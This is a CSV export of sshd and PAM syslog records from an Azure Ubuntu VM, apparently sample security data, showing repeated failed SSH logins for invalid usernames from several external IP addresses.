+18225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:17,UbuntuDevEnv,2019-06-26 09:43:16,auth,UbuntuDevEnv,info,Disconnected from invalid user vpn 187.6.249.142 port 48450 [preauth],74673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vpn,187.6.249.1,48450,,
+18226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:17,UbuntuDevEnv,2019-06-26 09:43:16,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 48450:11: Bye Bye [preauth],74673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,48450,,
+18227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:25,UbuntuDevEnv,2019-06-26 09:43:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:25,UbuntuDevEnv,2019-06-26 09:43:25,auth,UbuntuDevEnv,info,Invalid user wei from 176.31.202.90 port 34176,74710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wei,176.31.202.9,34176,,
+18229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:25,UbuntuDevEnv,2019-06-26 09:43:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,74710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:28,UbuntuDevEnv,2019-06-26 09:43:27,auth,UbuntuDevEnv,info,Failed password for invalid user wei from 176.31.202.90 port 34176 ssh2,74710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wei,176.31.202.9,34176,,
+18231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:28,UbuntuDevEnv,2019-06-26 09:43:28,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 34176:11: Bye Bye [preauth],74710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,34176,,
+18232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:28,UbuntuDevEnv,2019-06-26 09:43:28,auth,UbuntuDevEnv,info,Disconnected from invalid user wei 176.31.202.90 port 34176 [preauth],74710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wei,176.31.202.9,34176,,
+18233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:50,UbuntuDevEnv,2019-06-26 09:43:50,auth,UbuntuDevEnv,info,Connection closed by 115.159.216.187 port 49302 [preauth],74765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,49302,,
+18234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:57,UbuntuDevEnv,2019-06-26 09:43:56,auth,UbuntuDevEnv,info,Invalid user peng from 165.22.203.187 port 45842,74824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peng,165.22.203.1,45842,,
+18235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:57,UbuntuDevEnv,2019-06-26 09:43:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:57,UbuntuDevEnv,2019-06-26 09:43:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,74824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:59,UbuntuDevEnv,2019-06-26 09:43:58,auth,UbuntuDevEnv,info,Failed password for invalid user peng from 165.22.203.187 port 45842 ssh2,74824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peng,165.22.203.1,45842,,
+18238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:59,UbuntuDevEnv,2019-06-26 09:43:58,auth,UbuntuDevEnv,info,Disconnected from invalid user peng 165.22.203.187 port 45842 [preauth],74824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peng,165.22.203.1,45842,,
+18239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:43:59,UbuntuDevEnv,2019-06-26 09:43:58,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 45842:11: Bye Bye [preauth],74824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,45842,,
+18240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:28,UbuntuDevEnv,2019-06-26 09:44:27,auth,UbuntuDevEnv,info,Invalid user amwambogo from 176.31.43.255 port 37054,74938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,176.31.43.2,37054,,
+18241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:28,UbuntuDevEnv,2019-06-26 09:44:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:28,UbuntuDevEnv,2019-06-26 09:44:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,74938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:29,UbuntuDevEnv,2019-06-26 09:44:29,auth,UbuntuDevEnv,info,Failed password for invalid user amwambogo from 176.31.43.255 port 37054 ssh2,74938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,176.31.43.2,37054,,
+18244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:29,UbuntuDevEnv,2019-06-26 09:44:29,auth,UbuntuDevEnv,info,Disconnected from invalid user amwambogo 176.31.43.255 port 37054 [preauth],74938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,176.31.43.2,37054,,
+18245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:29,UbuntuDevEnv,2019-06-26 09:44:29,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 37054:11: Bye Bye [preauth],74938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,37054,,
+18246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:50,UbuntuDevEnv,2019-06-26 09:44:50,auth,UbuntuDevEnv,info,Invalid user vweru from 176.31.202.90 port 50984,75017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,176.31.202.9,50984,,
+18247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:50,UbuntuDevEnv,2019-06-26 09:44:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,75017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:50,UbuntuDevEnv,2019-06-26 09:44:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:52,UbuntuDevEnv,2019-06-26 09:44:51,auth,UbuntuDevEnv,info,Failed password for invalid user vweru from 176.31.202.90 port 50984 ssh2,75017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,176.31.202.9,50984,,
+18250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:52,UbuntuDevEnv,2019-06-26 09:44:51,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 50984:11: Bye Bye [preauth],75017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,50984,,
+18251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:44:52,UbuntuDevEnv,2019-06-26 09:44:51,auth,UbuntuDevEnv,info,Disconnected from invalid user vweru 176.31.202.90 port 50984 [preauth],75017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,176.31.202.9,50984,,
+18252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:09,UbuntuDevEnv,2019-06-26 09:45:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142  user=test,75106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,187.6.249.1,,0,
+18253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:11,UbuntuDevEnv,2019-06-26 09:45:11,auth,UbuntuDevEnv,info,Failed password for test from 187.6.249.142 port 37112 ssh2,75106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37112,,
+18254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:11,UbuntuDevEnv,2019-06-26 09:45:11,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 187.6.249.142 port 37112 [preauth],75106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,187.6.249.1,37112,,
+18255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:11,UbuntuDevEnv,2019-06-26 09:45:11,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 37112:11: Bye Bye [preauth],75106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37112,,
+18256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:22,UbuntuDevEnv,2019-06-26 09:45:22,auth,UbuntuDevEnv,info,Invalid user arc from 165.22.203.187 port 39888,75166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,165.22.203.1,39888,,
+18257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:22,UbuntuDevEnv,2019-06-26 09:45:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,75166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:22,UbuntuDevEnv,2019-06-26 09:45:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:24,UbuntuDevEnv,2019-06-26 09:45:24,auth,UbuntuDevEnv,info,Failed password for invalid user arc from 165.22.203.187 port 39888 ssh2,75166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,165.22.203.1,39888,,
+18260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:24,UbuntuDevEnv,2019-06-26 09:45:24,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 39888:11: Bye Bye [preauth],75166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,39888,,
+18261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:24,UbuntuDevEnv,2019-06-26 09:45:24,auth,UbuntuDevEnv,info,Disconnected from invalid user arc 165.22.203.187 port 39888 [preauth],75166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,165.22.203.1,39888,,
+18262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:43,UbuntuDevEnv,2019-06-26 09:45:42,auth,UbuntuDevEnv,info,Connection closed by 115.159.216.187 port 57410 [preauth],75217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,57410,,
+18263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:49,UbuntuDevEnv,2019-06-26 09:45:49,auth,UbuntuDevEnv,info,Invalid user webmin from 176.31.43.255 port 43574,75323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,176.31.43.2,43574,,
+18264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:49,UbuntuDevEnv,2019-06-26 09:45:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:49,UbuntuDevEnv,2019-06-26 09:45:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,75323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:51,UbuntuDevEnv,2019-06-26 09:45:51,auth,UbuntuDevEnv,info,Failed password for invalid user webmin from 176.31.43.255 port 43574 ssh2,75323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,176.31.43.2,43574,,
+18267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:51,UbuntuDevEnv,2019-06-26 09:45:51,auth,UbuntuDevEnv,info,Disconnected from invalid user webmin 176.31.43.255 port 43574 [preauth],75323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,176.31.43.2,43574,,
+18268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:45:51,UbuntuDevEnv,2019-06-26 09:45:51,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 43574:11: Bye Bye [preauth],75323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,43574,,
+18269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:16,UbuntuDevEnv,2019-06-26 09:46:16,auth,UbuntuDevEnv,info,Invalid user ir from 176.31.202.90 port 39566,75423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,176.31.202.9,39566,,
+18270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:16,UbuntuDevEnv,2019-06-26 09:46:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,75423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:16,UbuntuDevEnv,2019-06-26 09:46:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:18,UbuntuDevEnv,2019-06-26 09:46:18,auth,UbuntuDevEnv,info,Failed password for invalid user ir from 176.31.202.90 port 39566 ssh2,75423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,176.31.202.9,39566,,
+18273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:18,UbuntuDevEnv,2019-06-26 09:46:18,auth,UbuntuDevEnv,info,Disconnected from invalid user ir 176.31.202.90 port 39566 [preauth],75423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,176.31.202.9,39566,,
+18274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:18,UbuntuDevEnv,2019-06-26 09:46:18,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 39566:11: Bye Bye [preauth],75423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,39566,,
+18275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:48,UbuntuDevEnv,2019-06-26 09:46:47,auth,UbuntuDevEnv,info,Invalid user vn from 165.22.203.187 port 33946,75530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,165.22.203.1,33946,,
+18276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:48,UbuntuDevEnv,2019-06-26 09:46:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,75530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:48,UbuntuDevEnv,2019-06-26 09:46:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:50,UbuntuDevEnv,2019-06-26 09:46:49,auth,UbuntuDevEnv,info,Failed password for invalid user vn from 165.22.203.187 port 33946 ssh2,75530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,165.22.203.1,33946,,
+18279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:50,UbuntuDevEnv,2019-06-26 09:46:49,auth,UbuntuDevEnv,info,Disconnected from invalid user vn 165.22.203.187 port 33946 [preauth],75530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,165.22.203.1,33946,,
+18280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:46:50,UbuntuDevEnv,2019-06-26 09:46:49,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 33946:11: Bye Bye [preauth],75530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,33946,,
+18281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:03,UbuntuDevEnv,2019-06-26 09:47:03,auth,UbuntuDevEnv,info,Invalid user hadoopuser from 187.6.249.142 port 54010,75581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoopuser,187.6.249.1,54010,,
+18282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:03,UbuntuDevEnv,2019-06-26 09:47:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,75581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:03,UbuntuDevEnv,2019-06-26 09:47:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:05,UbuntuDevEnv,2019-06-26 09:47:05,auth,UbuntuDevEnv,info,Failed password for invalid user hadoopuser from 187.6.249.142 port 54010 ssh2,75581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoopuser,187.6.249.1,54010,,
